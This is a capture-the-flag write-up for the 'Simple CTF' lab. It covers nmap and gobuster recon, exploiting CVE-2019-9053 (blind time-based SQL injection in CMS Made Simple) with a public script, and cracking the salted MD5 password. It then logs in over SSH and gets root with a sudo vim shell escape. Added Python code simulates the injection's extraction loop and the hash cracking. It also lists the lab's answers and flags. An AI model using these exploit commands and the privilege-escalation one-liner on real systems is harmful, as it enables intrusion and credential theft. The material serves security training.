Simple CTF

Task 1 :  How many services are running under port 1000? 

Using Nmap we do a full scan. We could pass -p 1-1000 since the question only asks about ports under 1000, but a full port scan gives us the lay of the land for the later tasks (the target address is omitted from the commands below).

# nmap -A -p- -Pn -oN nmap_output

-A : Aggressive scan: enables OS detection, version detection (-sV), default script scanning (-sC) and traceroute

-p- : Scan all 65535 TCP ports (the default is only the 1000 most common ones)

-Pn : Skip host discovery and treat the host as up (no ping), useful when ICMP is filtered

-oN : Write normal (human-readable) output to the file nmap_output

Answer 1 : Two (2)

Task 2 : What is running on the higher port?

The higher port is 2222

Answer 2 : SSH
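The first two tasks are answered by reading the port table of the nmap_output file. The following is an added example, not part of the original write-up, that parses nmap's normal (-oN) output and derives both answers from it: the number of open services below port 1000 and the service name on the highest open port. The scan text is constructed for the example (the address, version banners and the filtered port 139 are assumptions), and only rows in state "open" are counted, so a filtered or closed row does not inflate the answer.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -oN` output (not the real scan from this write-up).
# The open ports mirror the write-up (two services under 1000, SSH on 2222);
# 139/tcp is added in state "filtered" to show that only "open" rows count.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -A -p- -Pn -oN nmap_output 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.050s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 3.0.3
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  filtered netbios-ssn
2222/tcp open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

# Nmap done at Mon Jan  1 00:05:00 2024 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# One row of the port table: "<port>/<proto> <state> <service> [version...]".
# The state can also be compound, e.g. "open|filtered", hence \S+ rather than \w+.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text):
    """Parse the port table of nmap normal output into PortEntry objects.
    Header, "Not shown:" and "Service Info:" lines do not match the regex
    and are skipped."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            entries.append(PortEntry(int(m["port"]), m["proto"], m["state"],
                                     m["service"], (m["version"] or "").strip()))
    return entries


def open_ports(entries):
    """Only rows nmap marked exactly "open"; "open|filtered" is deliberately
    excluded because nmap could not confirm a listener there."""
    return [e for e in entries if e.state == "open"]


def count_open_below(entries, limit):
    """Task 1: number of open services on ports strictly below `limit`."""
    return sum(1 for e in open_ports(entries) if e.port < limit)


def highest_open_service(entries):
    """Task 2: (port, service) nmap reported for the highest open port."""
    highest = max(open_ports(entries), key=lambda e: e.port)
    return highest.port, highest.service


if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print("open services under 1000:", count_open_below(found, 1000))
    print("highest open port:", highest_open_service(found))
```

The service column is nmap's guess from its port table plus -sV fingerprinting, so on an unusual port like 2222 it is the version string (here an OpenSSH banner) rather than the port number that justifies the answer "SSH".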

Task 3 : What's the CVE you're using against the application?

Let's have a look at the web app running on port 80. I am going to use gobuster for this scan (the target URL after -u is omitted here).

# gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 10

dir : directory brute-forcing mode

-u : target URL

-w : wordlist

-x : file extensions to append to every word (html, php, txt)

-t : thread count

Gobuster returned an interesting directory, /simple. After navigating to it we can see that the application running on the server is CMS Made Simple; the page footer shows the installed version, which is what we match against public exploits.

The first Google result for "CMS Made Simple exploit" points to the Exploit-DB entry "CMS Made Simple < 2.2.10 - SQL Injection", which references the CVE below.

Answer 3 : CVE-2019-9053

Task 4 : To what kind of vulnerability is the application vulnerable?

From the CVE description we can see it's vulnerable to SQL injection: an unauthenticated, blind, time-based injection through the m1_idlist parameter of the News module, reachable with a crafted URL. Time-based means the only signal the attacker gets is response latency, which is why the exploit later needs many requests per character.

Answer 4 : SQLi
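Because the injection is blind and time-based, the exploit does not see query results; it appends a conditional sleep() to the query and measures whether the response was delayed, recovering the target value one character at a time by extending a LIKE 'prefix%' pattern. The following is an added example, not code from the write-up or from the Exploit-DB script, that shows that extraction loop against a constructed in-memory oracle (no requests are sent; the secret string and the two-second delay are assumptions for the demo). It also handles the edge case a naive implementation gets wrong: '%' and '_' are LIKE wildcards, so a recovered prefix containing them must be escaped or the next probe matches the wrong character.

```python
import re
import string

LIKE_ESCAPE = "\\"  # MySQL's default LIKE escape character


def escape_like(text, esc=LIKE_ESCAPE):
    """Escape the LIKE wildcards in text already recovered so a literal '%'
    or '_' in the known prefix is not treated as a wildcard by the next probe."""
    return (text.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def like_matches(value, pattern, esc=LIKE_ESCAPE):
    """Simulate MySQL `value LIKE 'pattern'` with backslash escaping.
    Collation caveat: real MySQL LIKE is case-insensitive on non-binary
    columns, so a lowercase charset recovers a lowercased copy of the value."""
    regex = ""
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == esc and i + 1 < len(pattern):      # escaped char is literal
            regex += re.escape(pattern[i + 1])
            i += 2
            continue
        regex += ".*" if ch == "%" else "." if ch == "_" else re.escape(ch)
        i += 1
    return re.fullmatch(regex, value, re.DOTALL | re.IGNORECASE) is not None


def make_oracle(secret, sleep_seconds=2.0):
    """Constructed stand-in for the vulnerable endpoint. The real request
    injects a conditional sleep() whose WHERE clause compares the column
    being stolen against the pattern with LIKE; a slow reply means 'true'.
    Here we just return the latency that server would exhibit."""
    def oracle(like_pattern):
        return sleep_seconds if like_matches(secret, like_pattern) else 0.0
    return oracle


def extract_value(oracle, charset, max_len=64, threshold=1.5, escape=True):
    """Recover a value character by character. For each position try every
    charset character as the next byte of the prefix; a response slower than
    `threshold` seconds confirms the guess. Stops when no character extends
    the prefix (end of value, or a character outside the charset).
    Returns (recovered_value, number_of_probes)."""
    known = ""
    probes = 0
    for _ in range(max_len):
        for ch in charset:
            probes += 1
            prefix = escape_like(known + ch) if escape else known + ch
            if oracle(prefix + "%") >= threshold:
                known += ch
                break
        else:
            break  # no candidate matched: the value is complete
    return known, probes


if __name__ == "__main__":
    # Constructed target value: contains both LIKE wildcards on purpose.
    oracle = make_oracle("s3cr3t_%1")
    charset = string.ascii_lowercase + string.digits + "_%"
    print("escaped  :", extract_value(oracle, charset, max_len=16))
    print("unescaped:", extract_value(oracle, charset, max_len=16, escape=False))
```

With escaping the loop stops by itself once the value is exhausted; without it the unescaped '%' in the prefix makes every later probe "match", so the loop runs to max_len and returns garbage after the real characters. For a salt or an MD5 hash the charset is just hex digits and this problem cannot arise, which is why the hash phase of the public exploit is the cheap part; each character still costs up to len(charset) requests, each one paying the sleep delay on a hit.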

Task 5 : What’s the password

HINT :You can use /usr/share/seclists/Passwords/Common-Credentials/best110.txt to crack the pass

Under /simple there are links to:

- the application login page
- a POST request (login form submission)

For this, we will use the exploit we found earlier for CVE-2019-9053. It already ships with Kali's local copy of Exploit-DB, so searchsploit finds it offline.

# searchsploit cms made simple 2.2.8

This script is written in Python 2, but recent Kali releases only ship Python 3, so we need to convert it with 2to3. Note that -w rewrites the file in place: copy it out of /usr/share/exploitdb first (searchsploit -m mirrors an exploit into the current directory) rather than editing the shared copy. lib2to3 is deprecated and was removed in Python 3.13, so on a very new interpreter the conversion has to be done by hand or with an older Python.

# apt install 2to3
# apt install python3-lib2to3
# apt install python3-toolz
# find / -type f -name
# python3 -m lib2to3 /usr/share/exploitdb/exploits/php/webapps/ -w

(2to3 output omitted)

Now let's run the script (the script name and the target URL after -u are omitted here).

# python3 -u --crack -w /usr/share/dirb/wordlists/others/best110.txt

The script first extracts the salt, username, e-mail and password hash one character at a time through the time-based injection, then --crack runs the wordlist against the hash. After a long wait we get the username and the cracked password.

Username : mitch

Password : secret

Answer 5 : secret
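The "--crack" phase is a plain dictionary attack: the exploit recovers the site salt together with the user's hash, then hashes every wordlist entry as md5(salt + candidate) until one matches. The following is an added example, not the exploit's own code, that reproduces that loop offline. The salt value is a made-up hex string and the target hash is computed here from the password "secret", so the block is self-checking; the six-line wordlist is constructed in the shape of best110.txt.

```python
import hashlib
import re

# Constructed stand-ins for what the injection pulls out of the database.
# The salt is a hypothetical value; the hash is derived here from "secret"
# purely so the demo can verify itself (it is not the real target's hash).
SALT = "1dac0d92e9fa6bb2"
TARGET_HASH = hashlib.md5((SALT + "secret").encode()).hexdigest()

# Constructed mini wordlist in the format of best110.txt: one candidate per line.
WORDLIST = """\
123456
password
qwerty
letmein
secret
admin
"""

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def cmsms_hash(salt, candidate):
    """Salted MD5 as the exploit's --crack routine computes it: md5(salt + password)."""
    return hashlib.md5((salt + candidate).encode()).hexdigest()


def crack(target_hash, salt, wordlist_text):
    """Return the first wordlist entry whose salted MD5 equals target_hash,
    or None if the list is exhausted. A hash that is not 32 hex characters
    means the injection phase returned garbage, so refuse to waste time on it."""
    if not MD5_HEX.match(target_hash):
        raise ValueError("target hash is not a 32-character hex MD5 digest")
    for line in wordlist_text.splitlines():
        candidate = line.rstrip("\r\n")
        if not candidate:
            continue
        if cmsms_hash(salt, candidate) == target_hash:
            return candidate
    return None


if __name__ == "__main__":
    print("cracked:", crack(TARGET_HASH, SALT, WORDLIST))
```

Because the salt is per-site rather than per-user, one pass over the wordlist can test every hash pulled from the same install; the slow part of the real run is the character-by-character extraction over the network, not this loop.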

Task 6 : Where can you login with the details obtained?

First try was a success, SSH on port 2222

# ssh mitch@ -p 2222

And I also managed to connect to the admin panel at :

Answer 6 : SSH

Task 7 : What’s the user flag?

Having a look at the home directory.

Answer 7 : G00d j0b, keep up!

Task 8 : Is there any other user in the home directory? What’s its name?

Task 9 : What can you leverage to spawn a privileged shell?

$ cd /home && ls -la
$ sudo -l

In /home we can see there is another user called sunbath.

Running sudo -l lists the commands this user is allowed to run through sudo; here it is vim, which is enough for a root shell.

Answer 8 : sunbath

Answer 9 : vim

Task 10 : What’s the root flag?

First stop for abusing a binary allowed through sudo is GTFOBins. Its vim entry spawns a shell from vim's command mode with -c ':!command'; because sudo runs vim as root, the shell it spawns is root too (confirm with id before reading the flag).

$ sudo vim -c ':!/bin/sh'

Answer 10 : W3ll d0n3. You made it!